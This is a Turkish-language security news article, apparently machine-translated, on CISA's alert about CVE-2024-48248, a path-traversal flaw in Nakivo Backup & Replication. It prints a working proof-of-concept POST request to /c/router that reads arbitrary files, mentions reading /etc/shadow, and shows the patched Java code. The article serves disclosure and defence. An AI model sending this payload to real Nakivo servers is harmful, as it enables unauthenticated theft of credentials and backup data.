ABD Siber Güvenlik ve Altyapı Güvenlik Ajansı (CISA), CVE-2024-48248 olarak bilinen Nakivo Yedekleme ve Çoğaltma Yazılımında ciddi bir güvenlik açığı hakkında bir uyarı yayınladı.
Bu güvenlik açığı, saldırganların mutlak bir yol geçiş kusurundan yararlanmasına izin vererek, kimlik doğrulaması yapmadan keyfi dosyaları okumalarını sağlar.
Güvenlik açığı, özellikle /c /yönlendirici uç noktası aracılığıyla STPRELOADManagement eyleminde Nakivo Yedekleme ve Çoğaltma Çözümünün Yönetmen Web Arayüzünde bulunur.
Dosya yolu parametresini manipüle ederek, saldırganlar yazılımın çalıştığı sistemdeki herhangi bir dosyaya erişebilir. Bu, yetkisiz veri açığa çıkmasına veya diğer kötü amaçlı etkinliklere yol açabilecek kritik sistem dosyalarını ve yedekleme verilerini içerir.
Etki ve sömürü
Güvenlik açığının doğası göz önüne alındığında, saldırganlar sistem dosyaları, veritabanı kimlik bilgileri ve yedekleme verileri gibi hassas bilgileri okumak için kullanabilir.
Nakivo yazılımı genellikle bulut ortamları, sanal altyapı ve ağ cihazları ile bütünleşerek potansiyel etkiyi genişletir.
Saldırganlar bu güvenlik açığını AWS anahtarlarına, SSH kimlik bilgilerine veya Nakivo tarafından yedekleme işlemleri için depolanan diğer ayrıcalıklı bilgilere erişmek için kullanabilirler.
Kavram kanıtı (POC) gösterildi
Bu güvenlik açığı için bir kavram kanıtı (POC) gösterilmiştir. Aşağıdaki yükle /c /yönlendirici uç noktasına hazırlanmış bir istek gönderilmesini içerir:
POST /c/router HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
Connection: keep-alive
Content-Length: 121
{
"action": "STPreLoadManagement",
"method": "getImageByPath",
"data": ["C:/windows/win.ini"],
"type": "rpc",
"tid": 3980,
"sid": ""
}
Bu istek, bir Windows sistemindeki c: /windows/win.ini dosyasını okumak için stpreloadmanagement eyleminin GetImageByPath yöntemini kullanır.
Benzer şekilde, saldırganlar bu yöntemi Linux sistemlerinde /etc /Shadow gibi hassas dosyaları okumak için kullanabilirler.
Azaltma ve satıcı yanıtı
Nakivo, 11.0.88174 sürümündeki güvenlik açığını sessizce yamaladı ve daha sonraki sürümler.
Düzeltme, ana dizin referanslarını ve yol manipülasyon girişimlerini çıkararak güvenli bir dosya yolu oluşturan FileUTils kitaplığı kullanılarak dosya yollarının sterilize edilmesini sağlayarak dizin geçişini önler.
Yamalı versiyonda:
public byte[] getImageByPath(String path) throws IOException {
String fileName = FilenameUtils.getName(path);
File targetFile = FileUtils.getFile(new String[] { "userdata", "branding", fileName });
if (!targetFile.exists() || !targetFile.canRead() || targetFile.isDirectory()) {
throw new IOException(Lang.get("services.branding.no.file", new Object[0]));
}
return FileUtils.readFileToByteArray(targetFile);
}
CISA, kullanıcıların hemen satıcı tarafından sağlanan yamalar uygulamasını önerir. Yamalar mevcut değilse, kullanıcılar bir düzeltme sağlanana kadar ürünün kullanımını durdurmayı düşünmelidir.
Ek olarak, Bağlayıcı Operasyonel Direktif (BOD) 22-01’de belirtildiği gibi bulut hizmetlerini güvence altına almak için en iyi uygulamaları izlemek, CVE-2024-48248 gibi güvenlik açıklarıyla ilişkili potansiyel risklerin azaltılmasına yardımcı olabilir.
Nakivo güvenlik açığı, özellikle bu sistemlerin genellikle kritik verilere sahip olduğu ortamlarda, yedekleme çözümlerinin güvence altına alınmasının artan önemini vurgulamaktadır.
Fidye yazılımı saldırıları gelişmeye devam ettikçe, yedekleme mekanizmalarının sağlam ve güvenli olmasını sağlamak çok önemlidir.
Kullanıcılar ve kuruluşlar, ortaya çıkan tehditlere karşı korunmak için CVE-2024-48248 gibi güvenlik açıklarını ele almada uyanık ve proaktif kalmalıdır.
Investigate Real-World Malicious Links & Phishing Attacks With Threat Intelligence Lookup - Try for Free